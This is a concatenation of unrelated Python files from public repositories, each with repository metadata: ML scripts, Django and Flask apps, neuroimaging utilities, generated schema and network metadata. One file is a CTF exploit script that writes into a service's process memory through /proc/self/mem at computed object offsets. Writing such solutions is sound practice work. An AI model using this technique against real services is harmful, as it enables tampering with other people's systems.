visuals = MultiChannelAE()
visuals.add_ae(shot_encoder, [0, 4, 5], [0])
visuals.add_ae(player_encoder, [1, 4, 5], [1])
visuals.add_ae(invaders_encoder, [2, 4, 5], [2])
visuals.add_ae(barrier_encoder, [3, 4, 5], [3])
visuals.register_forward_hook(view_decode)
visuals.register_forward_hook(view_image)

# Pre-trained controller picked from policy run 12.
controller_file = config.basepath() / 'SpaceInvaders-v4' / 'policy_runs' / '12' / 'best_model0'
controller = torch.load(controller_file)

env = gym.make('SpaceInvaders-v4')
policy = VCPolicyMultiAE(visuals, controller, segmentor, device)

# Roll the policy out, rendering each frame to a window; the loop body is
# empty because the hooks above do all the visualisation.
for screen, observation, reward, done, info, action in RolloutGen(env, policy, render_to_window=True, populate_screen=True):
    pass
| [
"duane.nielsen.rocks@gmail.com"
] | duane.nielsen.rocks@gmail.com |
959c221a758d984633a88e173de535bdbc2ce2a4 | 9c4850697d66c6119e1d0b1f6347c1ea1d5d1ebb | /devilry/thirdpartylibs/djangorestframework/tests/package.py | 4e1e23da0fa83946dc917366bb1345b093d1f662 | [
"BSD-2-Clause"
] | permissive | evestera/devilry-django | 7952e0d65f23af6c4dc2fd22fb97462e4231deac | 760a4ca1c40a7ac0d60f7675efa6919ffae585da | refs/heads/master | 2020-12-25T20:09:00.756243 | 2015-05-21T16:33:47 | 2015-05-21T16:33:47 | 36,460,383 | 0 | 0 | null | 2015-05-28T19:14:10 | 2015-05-28T19:14:09 | null | UTF-8 | Python | false | false | 337 | py | """Tests for the djangorestframework package setup."""
from django.test import TestCase
from devilry.thirdpartylibs import djangorestframework
class TestVersion(TestCase):
    """Simple sanity test to check the VERSION exists"""

    def test_version(self):
        """Ensure the VERSION exists."""
        # Attribute access alone is the assertion: it raises AttributeError
        # (failing the test) when VERSION is missing.
        djangorestframework.VERSION
| [
"post@espenak.net"
] | post@espenak.net |
8ca177fd23012a8e8f97b04acebaeeaa67b2d729 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/Cases/2461/.mooctest/answer.py | ee1e496ff71961d6141dd1bb59c5ad82861e8bd9 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | class Solution:
def findMin(self, nums) -> int:
for i in range(len(nums)-1):
if nums[i+1] < nums[i]: return nums[i+1]
return nums[0]
# Read a comma-separated integer list from stdin; the file-level print on the
# next line reports the rotation-point minimum.
b = input().split(',')
c = [int(i) for i in b]  # idiomatic conversion (was an explicit append loop)
s = Solution()
print(s.findMin(c)) | [
"382335657@qq.com"
] | 382335657@qq.com |
f175cb18b3e42357f3f0e429e996aca1a42426d7 | bb29dcc06b2f405e4e76d886ae5b60254fc13c3d | /web.py | 79299c4e85a8d72bd52a8d3370b2f1aa5af61755 | [
"MIT"
] | permissive | cientista/ua-parser-website | 330b66df4f4b878442b7af236c5a14f134e81aca | d0911c46baef8115c5504c4020300477c3a3162c | refs/heads/master | 2020-05-27T02:01:16.474172 | 2019-05-02T06:31:31 | 2019-05-02T06:31:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | import json
from flask import Flask, render_template, request
from ua_parser import user_agent_parser
app = Flask(__name__)


@app.route("/")
def index():
    """Render the UA-parser page; parse the ``?ua=`` query param when given."""
    ua = request.args.get('ua')
    if ua:
        parsed_encoded = json.dumps(user_agent_parser.Parse(ua), indent=2)
    else:
        parsed_encoded = None
    current_ua = request.headers.get('User-Agent')
    return render_template(
        "index.html",
        ua=ua,
        current_ua=current_ua,
        parsed_encoded=parsed_encoded,
    )
| [
"roman.imankulov@gmail.com"
] | roman.imankulov@gmail.com |
adf6d934419c355b36e68b81d02134ac7a49ae86 | 340f106a213c57d5621124187ca061690334364d | /ids_to_tfrecords.py | fa6365a73497f079182a9342bf5c1f1e3c84b5b3 | [] | no_license | sculd/financial-timeseries-prediction | c461bc7a7c8760ab090b8f53da50daa1f754da7f | c31784a63402580d0b04557e2ab29fc9a3126c9f | refs/heads/master | 2022-10-11T16:53:46.469168 | 2020-09-27T04:19:41 | 2020-09-27T04:19:41 | 209,095,902 | 0 | 0 | null | 2022-09-23T22:28:02 | 2019-09-17T15:52:12 | Python | UTF-8 | Python | false | false | 1,080 | py | import data.news.news_with_series_and_word_ids as news_with_ids
import sys
import tensorflow as tf
def _int64_feature(value):
    """Wrap a scalar int in a ``tf.train.Feature`` (``int64_list`` field)."""
    return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _float_feature(value):
    """Wrap a scalar float in a ``tf.train.Feature`` (``float_list`` field).

    Bug fix: the float payload must be assigned to the ``float_list`` proto
    field; the original passed a FloatList as ``int64_list``, which the
    Feature constructor rejects with a type error.
    """
    return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
def _bytes_feature(value):
    """Wrap a bytes value in a ``tf.train.Feature`` (``bytes_list`` field)."""
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def to_tfrecord(infile, outfile):
    """Convert a padded news/series file into a TFRecord file.

    NOTE(review): ``img`` is referenced below but never defined in this
    function — as written the loop raises NameError on the first day;
    presumably a per-day image was meant to be extracted — confirm intent.
    """
    writer = tf.python_io.TFRecordWriter(outfile)
    dy = news_with_ids.Daily(infile)
    dit = news_with_ids.DailyIter(dy)
    while dit.has_next():
        day = dit.next()
        # NOTE(review): _float_feature expects a scalar (it wraps value in a
        # one-element list); verify day.series is scalar-compatible here.
        feature = {'series': _float_feature(day.series),
                   'val/image': _bytes_feature(tf.compat.as_bytes(img.tostring()))}
        example = tf.train.Example(features=tf.train.Features(feature=feature))
        writer.write(example.SerializeToString())
    writer.close()
    sys.stdout.flush()
if __name__ == '__main__':
    # Conversion entry points, currently left disabled:
    #to_tfrecord(news_with_ids.FILENAME_BLOOMBERG_PADDED)
    #to_tfrecord(news_with_ids.FILENAME_REUTERS_PADDED)
    pass
| [
"hjunlim@google.com"
] | hjunlim@google.com |
a26043b6ea7eb3b3799c888da1bdd4cb7d9183a7 | 9b018e9eac8d97fbcc1e76a69b95c994f79a6ea3 | /randomtest/migrations/0012_auto_20161022_0300.py | 48a3fcf8bd7d6e87f0cb8fb21a2ab32ff4a93869 | [] | no_license | hbgolze/contest-database | e39f269d7337652e7cdad03cc29827d4f729ec8f | 263385b438f7b7e1ab99062aad561ed0cec9c079 | refs/heads/master | 2023-06-26T21:30:08.246647 | 2023-06-11T02:34:41 | 2023-06-11T02:34:41 | 71,851,839 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-22 08:00
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ('randomtest', '0011_auto_20161018_1942'),
    ]

    operations = [
        # Adds the reverse accessor name ``problems`` on the Tag model.
        migrations.AlterField(
            model_name='problem',
            name='tags',
            field=models.ManyToManyField(related_name='problems', to='randomtest.Tag'),
        ),
    ]
| [
"hbgolze@gmail.com"
] | hbgolze@gmail.com |
cde73725aceafd00af8f2c1e6b8249f1fc874a29 | e0529f219e47a25d55bc2885d295a2567b2dad9e | /lyman/utils.py | 1796927c09136a85b94520a806b4ae6ebc3a152d | [
"BSD-3-Clause"
] | permissive | kastman/lyman | 062541e1e9b1fbe0434818d0b1f28fce0b1bb8d8 | 109ad309960637fcf10686809f61aa19fe77eb08 | refs/heads/master | 2021-01-12T22:37:57.917174 | 2017-09-11T18:58:07 | 2017-09-11T18:58:07 | 34,122,592 | 1 | 0 | null | 2015-04-17T14:55:42 | 2015-04-17T14:55:42 | null | UTF-8 | Python | false | false | 5,785 | py | import os.path as op
import subprocess as sp
import numpy as np
import nibabel as nib
from nipype.interfaces.base import BaseInterface
class LymanInterface(BaseInterface):
    """Enhanced Interface object that custom interface should inherit from."""

    def __init__(self, **inputs):
        super(LymanInterface, self).__init__(**inputs)
        # Output fields are accumulated here and surfaced via _list_outputs.
        self._results = {}

    def _list_outputs(self):
        """Override BaseInterface._list_outputs using out _results dict."""
        return self._results

    def define_output(self, field, fname):
        """Set an interface output field using an absolute path to `fname`."""
        fname = op.abspath(fname)
        self._results[field] = fname
        return fname

    def write_image(self, field, fname, data, affine=None, header=None):
        """Write a nibabel image to disk and assign path to output field."""
        fname = self.define_output(field, fname)
        if isinstance(data, nib.Nifti1Image):
            img = data
        else:
            # affine/header are only used when data is a raw array.
            img = nib.Nifti1Image(data, affine, header)
        img.to_filename(fname)
        return img

    def write_visualization(self, field, fname, viz):
        """Write a visualization to disk and assign path to output field."""
        fname = self.define_output(field, fname)
        viz.savefig(fname, close=True)

    def submit_cmdline(self, runtime, cmdline):
        """Submit a command-line job and capture the output."""
        # Ensure the runtime object (a dict-like Bunch — presumably nipype's;
        # it supports both .get() and attribute access) carries the fields
        # this method appends to.
        for attr in ["stdout", "stderr", "cmdline"]:
            if not hasattr(runtime, attr):
                setattr(runtime, attr, "")
        if runtime.get("returncode", None) is None:
            runtime.returncode = 0

        if isinstance(cmdline, list):
            cmdline = " ".join(cmdline)

        # NOTE(review): shell=True executes the joined string through the
        # shell; safe only for trusted, internally-built command lines.
        proc = sp.Popen(cmdline,
                        stdout=sp.PIPE,
                        stderr=sp.PIPE,
                        shell=True,
                        cwd=runtime.cwd,
                        env=runtime.environ,
                        universal_newlines=True)

        stdout, stderr = proc.communicate()
        # Accumulate (not overwrite) so multiple submissions are all recorded.
        runtime.stdout += "\n" + stdout + "\n"
        runtime.stderr += "\n" + stderr + "\n"
        runtime.cmdline += "\n" + cmdline + "\n"
        runtime.returncode += proc.returncode

        if proc.returncode is None or proc.returncode != 0:
            message = "\n\nCommand:\n" + runtime.cmdline + "\n"
            message += "Standard output:\n" + runtime.stdout + "\n"
            message += "Standard error:\n" + runtime.stderr + "\n"
            message += "Return code: " + str(runtime.returncode)
            raise RuntimeError(message)

        return runtime
def image_to_matrix(img, mask_img):
    """Extract image data from voxels where mask is nonzero.

    Parameters
    ----------
    img : nifti image
        Image (3D, or 4D time series) to pull voxel data from.
    mask_img : 3D nifti image
        Image defining the voxels where data will be extracted. All nonzero
        voxels will be used; the mask does not have to be binary.

    Returns
    -------
    data : n_vox or n_tp, n_vox numpy array
        Voxel data from ``img`` where the mask is nonzero. For a time series
        the time dimension is the first axis (matching a GLM design).
    """
    mask = mask_img.get_data() > 0
    vol_data = img.get_data()
    check_mask(mask, vol_data)
    return vol_data[mask].T
def matrix_to_image(data, mask_img, template_img=None):
    """Convert a vector or matrix of data into a nibabel image.

    Parameters
    ----------
    data : n_vox or n_tp, n_vox numpy array
        Data matrix; if a time series, time should be on the first axis.
    mask_img : 3D nifti image
        Image whose nonzero voxels receive ``data``; the mask does not have
        to be binary.
    template_img : nifti image, optional
        Source of the output affine and header; falls back to ``mask_img``.

    Returns
    -------
    img : nifti image
        Volume with ``data`` written into the nonzero-mask voxels.
    """
    n_x, n_y, n_z = mask_img.shape

    # A 2D matrix means a time series; a 1D vector means a single volume.
    try:
        n_tp, n_vox = data.shape
        vol_shape = n_x, n_y, n_z, n_tp
    except ValueError:
        n_vox, = data.shape
        vol_shape = n_x, n_y, n_z

    if template_img is None:
        template_img = mask_img

    # Scatter the matrix back into volumetric space where the mask is set.
    mask = mask_img.get_data() > 0
    vol_data = np.zeros(vol_shape, data.dtype)
    vol_data[mask] = data.T
    return nib.Nifti1Image(vol_data, template_img.affine, template_img.header)
def check_mask(mask, data):
    """Check the dtype and shape of a mask array.

    Raises a TypeError if ``mask`` is not boolean, or a ValueError if the
    shape of the mask matches neither ``data.shape`` nor its first
    (n - 1) dimensions.

    Parameters
    ----------
    mask : boolean numpy array
        Mask array to validate.
    data : numpy array
        Data that the mask will index into.
    """
    # Fix: ``np.bool`` was removed in NumPy 1.24; the builtin ``bool``
    # compares correctly against a numpy dtype.
    if mask.dtype != bool:
        raise TypeError("mask must have boolean datatype")
    if (mask.shape != data.shape) and (mask.shape != data.shape[:-1]):
        msg = ("mask shape {} is not aligned with data shape {}"
               .format(mask.shape, data.shape))
        raise ValueError(msg)
| [
"mwaskom@nyu.edu"
] | mwaskom@nyu.edu |
c8d40a97213711cc3933bc99f1589900311a3de2 | ab6996c3a3117cb64ba2805b1fd9cb0756f8ecbd | /Python/图像界面/a.py | 591f092d836dc2c9ec46d802223d31b6658f7dc3 | [] | no_license | LingFangYuan/Learning | ea8742e8f340ea337185d4b8c07bfe3b73fcfde8 | e71a3b38dca36de5427869b11341302deb6c55dd | refs/heads/master | 2021-06-30T16:46:22.424896 | 2020-10-19T01:13:40 | 2020-10-19T01:13:40 | 183,213,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | py | '''
1. 导入Tkinter包的所有内容
2. 从Frame派生一个Application类,这是所有Widget的父容器
3. 实例化Application,并启动消息循环
'''
from tkinter import *
class Application(Frame):
    """Root container widget: a greeting label plus a Quit button.

    ``pack()`` adds each widget to its parent and lays it out; ``grid()``
    exists for more complex layouts.  Clicking the button triggers
    ``self.quit()``, which ends the main loop.
    """

    def __init__(self, master=None):
        super().__init__(master)
        self.pack()
        self.createWidgets()

    def createWidgets(self):
        """Build the label and the Quit button."""
        self.helloLabel = Label(self, text='Hello, world!')
        self.helloLabel.pack()
        self.quitButton = Button(self, text='Quit', command=self.quit)
        self.quitButton.pack()
app = Application()
app.master.title('Hello World')  # set the window title
app.mainloop()  # enter the Tk main event loop
"786173189@qq.com"
] | 786173189@qq.com |
8c7e2adbc22996b3fd30a7b6dc04ab0e1152afaa | 581489b1f77fcfb44aa5d21a3d9a85eec131a992 | /Q3/adaptivemedian.py | f082e040f017d163bfab5db18d9f91f9caa204b3 | [] | no_license | mohit1997/DIP_Assignment3 | 070ba27c5de2ac3daf97cc999356a6dff7b1e690 | 412bcc4df41e2ab821e9b4ea1368db7afa84f7d1 | refs/heads/master | 2020-04-22T01:13:07.169836 | 2019-02-10T17:54:37 | 2019-02-10T17:54:37 | 170,007,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,741 | py | import cv2
import numpy as np
import matplotlib.pyplot as plt
# from numpy import *
def addsnp(img, prob):
    """Return a copy of ``img`` with salt-and-pepper noise.

    A fraction ``prob`` of pixels is forced to 0 (pepper) and another
    fraction ``prob`` to 255 (salt); the input image is left untouched.
    """
    noisy = img.copy()
    coin = np.random.rand(noisy.shape[0], noisy.shape[1])
    noisy[coin < prob] = 0
    noisy[coin > 1 - prob] = 255
    return noisy
def demo(target_array):
    """Return (median, max, min) of ``target_array`` as plain ints."""
    med = int(np.median(target_array))
    hi = int(np.max(target_array))
    lo = int(np.min(target_array))
    return med, hi, lo
def adaptivemedian(image, window=3):
    """Adaptive median filter for salt-and-pepper noise.

    For each pixel, growing square neighbourhoods (half-widths 1 ..
    ``window - 1``) are examined until one has a median strictly between
    its min and max; the pixel is then replaced by that median only if
    its original value equals the neighbourhood extreme (i.e. looks like
    an impulse).  The image is padded with 255 so border pixels have full
    windows.

    Parameters
    ----------
    image : 2-D uint8 numpy array
        Input image (NOT modified in place).
    window : int
        Pad width; sub-window half-widths run from 1 to ``window - 1``.

    Returns
    -------
    2-D uint8 numpy array with the same shape as ``image``.
    """
    # Fixes vs. the original: read the *parameter* shape (it used the
    # module-level ``img``), Python-3 print calls, and removal of the
    # broken except clause / unused locals.
    xlength, ylength = image.shape
    paddedimage = np.pad(image.copy(), window, 'constant', constant_values=255)
    # Working copy updated in place; comparisons against the original
    # pixel values go through the untouched ``paddedimage``.
    image_array = np.array(paddedimage, dtype=np.uint8)
    changed = 0
    for y in range(window, ylength + window):
        for x in range(window, xlength + window):
            for w in range(1, window):
                sub = image_array[x - w:x + w + 1, y - w:y + w + 1]
                median = int(np.median(sub))
                max_pixel = int(np.max(sub))
                min_pixel = int(np.min(sub))
                if min_pixel < median < max_pixel:
                    # Median is trustworthy; replace only impulse pixels.
                    if paddedimage[x, y] == min_pixel or paddedimage[x, y] == max_pixel:
                        image_array[x, y] = median
                        changed += 1
                    break
    print(changed, "pixel(s) filtered out of", xlength * ylength)
    # Strip the padding back off before returning.
    return image_array[window:-window, window:-window]
img = cv2.imread('sudoku.jpeg',0)  # 0 -> load as grayscale
print(img.shape)
noise_img = addsnp(img, prob=0.1)  # ~10% salt + ~10% pepper pixels
output = adaptivemedian(noise_img)
print(output.shape)
plt.imshow(output, cmap='gray')
plt.show()
"goyal.mohit999@gmail.com"
] | goyal.mohit999@gmail.com |
4edbc6f0e883443c9ada413f038f5dcd236353ab | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/unsignedShort/Schema+Instance/NISTXML-SV-IV-list-unsignedShort-length-3-5.py | e801ec78b6058e3ed692bed75dc6f63281b3cde9 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 384 | py | from output.models.nist_data.list_pkg.unsigned_short.schema_instance.nistschema_sv_iv_list_unsigned_short_length_3_xsd.nistschema_sv_iv_list_unsigned_short_length_3 import NistschemaSvIvListUnsignedShortLength3
obj = NistschemaSvIvListUnsignedShortLength3(
    # Sample instance for the list-of-unsignedShort schema type; seven
    # items, presumably chosen to satisfy the schema's length facet --
    # verify against the generated schema class.
    value=[
        63121,
        62313,
        61422,
        64312,
        61223,
        63123,
        62213,
    ]
)
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
efa0fb0b08d91fe3a42a3457bb078348a8855c06 | c57439f0c98af370ace65f9d55ef5a457bedc531 | /ydk/models/ethernet/_meta/_Cisco_IOS_XR_ethernet_link_oam_cfg.py | 74282235af8ec7a26796e056d9e2d8daca2e4608 | [
"Apache-2.0"
] | permissive | myahmao/ydk-py | c932fbd8245e554227cce0fd723d9a22887b0c40 | 2f367d93f2088d4abdc2f2bb10ca4864952b458a | refs/heads/master | 2021-01-14T11:32:29.064494 | 2016-03-15T22:44:05 | 2016-03-15T22:44:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,396 | py |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum, _dm_validate_value
from ydk.types import Empty, YList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYDataValidationError
from ydk.models import _yang_ns
_meta_table = {
'EtherLinkOamInterfaceModeEnum_Enum' : _MetaInfoEnum('EtherLinkOamInterfaceModeEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'passive':'PASSIVE',
'active':'ACTIVE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamProfileHelloIntervalEnum_Enum' : _MetaInfoEnum('EtherLinkOamProfileHelloIntervalEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'100ms':'Y_100MS',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'error-disable':'ERROR_DISABLE',
'log':'LOG',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionPrimEnum_Enum' : _MetaInfoEnum('EtherLinkOamEventActionPrimEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'log':'LOG',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamProfileRequireModeEnum_Enum' : _MetaInfoEnum('EtherLinkOamProfileRequireModeEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'passive':'PASSIVE',
'active':'ACTIVE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamInterfaceRequireModeEnum_Enum' : _MetaInfoEnum('EtherLinkOamInterfaceRequireModeEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'passive':'PASSIVE',
'active':'ACTIVE',
'dont-care':'DONT_CARE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum2_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum2_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'error-disable':'ERROR_DISABLE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum5_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum5_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'error-disable':'ERROR_DISABLE',
'efd':'EFD',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum4_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum4_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamProfileModeEnum_Enum' : _MetaInfoEnum('EtherLinkOamProfileModeEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'passive':'PASSIVE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum6_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum6_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'log':'LOG',
'efd':'EFD',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnumEfd_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnumEfd_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'error-disable':'ERROR_DISABLE',
'log':'LOG',
'efd':'EFD',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum1_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum1_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'error-disable':'ERROR_DISABLE',
'log':'LOG',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamInterfaceHelloIntervalEnum_Enum' : _MetaInfoEnum('EtherLinkOamInterfaceHelloIntervalEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'1s':'Y_1S',
'100ms':'Y_100MS',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
}
| [
"manradha@cisco.com"
] | manradha@cisco.com |
dd043fb3cbfb66d0d34258a4450127a65ceb0a86 | 1031b8594d4aa515efef1b09fec7ab0574a9c9ee | /ctf4b/misc/writeme/for_root/solve.py | 64bb1141e876426174d23ad85d2113fbff8fc999 | [] | no_license | kam1tsur3/2021_CTF | 0e322809dc95adab99e19f13dffbf209c5a923a1 | ee12843cd7901488730c41c8b313fc912cff9e46 | refs/heads/master | 2023-08-29T21:06:53.101057 | 2021-10-26T13:56:49 | 2021-10-26T13:56:49 | 328,184,763 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 932 | py | #!/usr/bin/python3
from pwn import *
import sys
#import kmpwn
sys.path.append('/home/vagrant/kmpwn')
from kmpwn import *
# fsb(width, offset, data, padding, roop)
# sop()
# fake_file()
#config
context(os='linux', arch='i386')  # pwntools target context
context.log_level = 'debug'
#FILE_NAME = ""
# NOTE(review): FILE_NAME is commented out above, so the local (non-'r')
# branch below raises NameError; only the remote path is usable as-is.
HOST = "writeme.quals.beginners.seccon.jp"
PORT = 27182

if len(sys.argv) > 1 and sys.argv[1] == 'r':
	conn = remote(HOST, PORT)  # pass 'r' to attack the remote service
else:
	conn = process(FILE_NAME)  # local debugging path (currently broken, see above)

#elf = ELF(FILE_NAME)
#addr_main = elf.symbols["main"]
#addr_bss = elf.bss()
#addr_dynsym = elf.get_section_by_name('.dynsym').header['sh_addr']
#
#libc = ELF('./')
#off_binsh = next(libc.search(b"/bin/sh"))
def exploit():
    # ``id(1)`` presumably leaks the CPython address of the int object 1;
    # the arithmetic below assumes later objects sit 0x20 bytes apart --
    # TODO confirm against the challenge binary.
    conn.sendlineafter("Chance: ", "id(1)")
    id1 = int(conn.recvline())
    id42 = id1+0x20*(42-1)
    id99 = id1+0x20*(99-1)  # NOTE(review): computed but never used below
    # Write into the process's own memory through /proc/self/mem at the
    # computed offset (0x18 bytes into the 42nd object's slot).
    conn.sendlineafter("File: ", "/proc/self/mem")
    conn.sendlineafter("Seek: ", str(id42+0x18))
    conn.interactive()

if __name__ == "__main__":
    exploit()
| [
"kam1tsur3@gmail.com"
] | kam1tsur3@gmail.com |
8cd63af1169d1fcf9e6125f76cc58d8141c7871d | bc441bb06b8948288f110af63feda4e798f30225 | /pipeline_sdk/api/provider/create_pb2.pyi | 8002306b0b0a1751fea438b6d5e9ee7a1d2bde36 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,201 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from pipeline_sdk.model.pipeline.provider_pb2 import (
Provider as pipeline_sdk___model___pipeline___provider_pb2___Provider,
)
from typing import (
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class CreateResponseWrapper(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
code = ... # type: builtin___int
codeExplain = ... # type: typing___Text
error = ... # type: typing___Text
@property
def data(self) -> pipeline_sdk___model___pipeline___provider_pb2___Provider: ...
def __init__(self,
*,
code : typing___Optional[builtin___int] = None,
codeExplain : typing___Optional[typing___Text] = None,
error : typing___Optional[typing___Text] = None,
data : typing___Optional[pipeline_sdk___model___pipeline___provider_pb2___Provider] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> CreateResponseWrapper: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> CreateResponseWrapper: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"data",b"data"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"code",b"code",u"codeExplain",b"codeExplain",u"data",b"data",u"error",b"error"]) -> None: ...
| [
"service@easyops.cn"
] | service@easyops.cn |
470106cd4abe3353497fb7c902be5c4d70ba8175 | 660e5b74a1cf44adce42c142e8ea92dc72077f86 | /app/main/forms.py | ea8c26e74f1bf3267439e012f48481f20b5f62c8 | [
"MIT"
] | permissive | vincentouma/pitch-hub | d48640572a9ee99d1aaf870663c9be879b0227fc | e6549d5607656be053928c8f04257be3fc1c8cfa | refs/heads/master | 2022-09-30T04:34:09.102432 | 2019-08-07T06:12:24 | 2019-08-07T06:12:24 | 200,806,879 | 0 | 0 | null | 2022-09-16T18:07:18 | 2019-08-06T08:12:39 | Python | UTF-8 | Python | false | false | 854 | py |
